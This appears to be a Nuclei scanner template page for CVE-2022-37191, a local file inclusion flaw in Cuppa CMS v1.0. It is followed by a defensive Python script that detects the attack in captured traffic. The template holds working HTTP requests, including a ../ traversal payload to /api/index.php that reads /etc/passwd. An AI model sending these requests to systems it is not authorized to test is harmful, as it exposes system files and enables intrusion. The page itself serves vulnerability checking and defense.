Cuppa CMS v1.0 - Authenticated Local File Inclusion
ID: CVE-2022-37191
Severity: medium
Author: theamanrawat
Tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms
Description
The component “cuppa/api/index.php” of CuppaCMS v1.0 is vulnerable to LFI. An authenticated user can read system files via a crafted POST request that uses the [function] parameter value as the LFI payload.
YAML Source
id: CVE-2022-37191

info:
  name: Cuppa CMS v1.0 - Authenticated Local File Inclusion
  author: theamanrawat
  severity: medium
  description: |
    The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37191
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-37191
    cwe-id: CWE-829
    epss-score: 0.39013
    epss-percentile: 0.97239
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Ftable_manager%2Fview%2Fcu_api_keys
      - |
        POST /api/index.php HTTP/1.1
        Host: {{Hostname}}
        key: {{apikey}}
        Content-Type: application/x-www-form-urlencoded

        function=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/

    matchers-condition: and
    matchers:
      - type: word
        part: header_3
        words:
          - "text/html"

      - type: regex
        part: body_3
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: apikey
        group: 1
        regex:
          - "<td class='td_key'>(.*?)</td>"
        internal: true
# digest: 4a0a00473045022100f10d47e51f86649e5a44b2f5dcd67b2ad53131483856f56d92eab7a1aadeed91022065e578e0113a96bb8d4752560cba2648ef5e454a12e68344acea68fd496bce57:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-37191.yaml"
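An added example (not part of the original template or of the Nuclei project): a Python check a defender could run over captured request/response pairs to flag the request pattern this template sends to /api/index.php, and to tell an attempt from a response that matched the template's body regex. It assumes legitimate `function` values are plain names without path segments; the event field names, the `getUser` value and the sample events are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

API_PATH = "/api/index.php"                  # endpoint from the template's third request
PASSWD_LEAK = re.compile(r"root:[x*]:0:0")   # same regex the template applies to body_3

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding and normalise backslashes to '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def suspicious_function_param(path, body):
    """True if a POST to the API endpoint carries a path-like `function` value."""
    if not path.split("?", 1)[0].endswith(API_PATH):
        return False
    # parse_qs performs the first round of percent-decoding on the form body.
    for raw in parse_qs(body, keep_blank_values=True).get("function", []):
        value = fully_decode(raw)
        if ".." in value.split("/") or value.startswith("/") or "\x00" in value:
            return True
    return False

def triage(events):
    """Return (id, verdict) per flagged event; 'leak' means the response matched too."""
    findings = []
    for ev in events:
        if suspicious_function_param(ev["path"], ev["req_body"]):
            leaked = PASSWD_LEAK.search(ev["resp_body"]) is not None
            findings.append((ev["id"], "leak" if leaked else "attempt"))
    return findings

# Constructed sample events (not real traffic); "getUser" is a made-up benign value.
SAMPLE_EVENTS = [
    {"id": 1, "path": "/api/index.php", "req_body": "function=getUser",
     "resp_body": "{}"},
    {"id": 2, "path": "/cuppa/api/index.php", "req_body": "function=./../../etc/passwd/",
     "resp_body": "root:x:0:0:root:/root:/bin/bash"},
    {"id": 3, "path": "/api/index.php", "req_body": "function=%252e%252e%255cetc%255cpasswd",
     "resp_body": "<html>error</html>"},
    {"id": 4, "path": "/index.php", "req_body": "function=../x", "resp_body": ""},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

Because the payload travels in the POST body, this check needs body capture (a reverse proxy, WAF or application log); standard access logs that record only the request line will not show it.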